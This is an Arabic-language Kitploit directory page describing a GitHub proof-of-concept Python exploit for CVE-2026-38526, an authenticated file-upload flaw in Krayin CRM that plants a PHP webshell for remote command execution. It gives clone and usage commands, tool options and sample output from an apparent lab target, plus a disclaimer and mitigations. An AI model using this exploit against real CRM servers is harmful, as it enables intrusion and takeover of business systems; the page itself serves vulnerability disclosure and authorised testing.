Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-38526 — Python PoC يستغل CVE-2026-38526 في Krayin CRM <= 2.2.x: رفع PHP webshell بعد المصادقة عبر /admin/tinymce/upload مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/harry178945/cve-2026-38526
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubharry178945/cve-2026-38526

CVE-2026-38526

Python PoC يستغل CVE-2026-38526 في Krayin CRM <= 2.2.x: رفع PHP webshell بعد المصادقة عبر /admin/tinymce/upload مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد.

عرض المستودع
منذ 2 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-38526 — Krayin CRM ≤ 2.2.x تنفيذ أوامر عن بُعد بعد المصادقة

⚠️ تنبيه قانوني: هذا الكود مُقدَّم لأغراض تعليمية وللاختبارات المصرَّح بها فقط (CTF، bug bounty، مختبر خاص). المؤلف غير مسؤول عن أي استخدام غير قانوني.

الوصف

Krayin CRM (Webkul) ≤ 2.2.x يكشف عن نقطة النهاية /admin/tinymce/upload التي تسمح لمستخدم مُصادَق عليه (حتى بصلاحيات منخفضة) برفع ملفات دون التحقق من الامتداد. يُخدَّم الملف بعد ذلك من مجلد storage/، مما يتيح التنفيذ التعسفي لكود PHP.

  • النوع: رفع ملف عشوائي → RCE
  • CVSS: 9.9 (حرج)
  • المصادقة مطلوبة: نعم (أي حساب صالح)

التثبيت

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

الاستخدام

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

الخيارات:

الخيارالوصف
-t, --targetعنوان URL الجذر للهدف
-u, --userالبريد الإلكتروني لحساب Krayin
-p, --passwordكلمة المرور
-c, --commandالأمر المراد تنفيذه (الافتراضي: id)
--login-pathمسار تسجيل الدخول (الافتراضي: /admin/login)
--upload-pathمسار الرفع (الافتراضي: /admin/tinymce/upload)
--timeoutمهلة HTTP (الافتراضي: 15)

مثال

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] Récupération du token CSRF sur http://billing.nexus.htb/admin/login
[*] Envoi du formulaire de login
[+] Authentification réussie
[*] Upload de x8f2k1ab.php via http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accessible : http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Exécution : id

============================================================
[+] Commande : id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

التخفيف

  • تحديث Krayin CRM إلى الإصدار المُصحَّح.
  • تقييد امتدادات الملفات المرفوعة (قائمة بيضاء).
  • منع تنفيذ PHP في مجلدات storage/ و uploads/.
  • تطبيق مبدأ أقل الصلاحيات على حسابات CRM.

إخلاء المسؤولية

هذا المشروع منشور لأغراض البحث الأمني. أي استخدام ضد أنظمة دون إذن كتابي مسبق غير قانوني ومحظور تمامًا.

تنزيل الأداة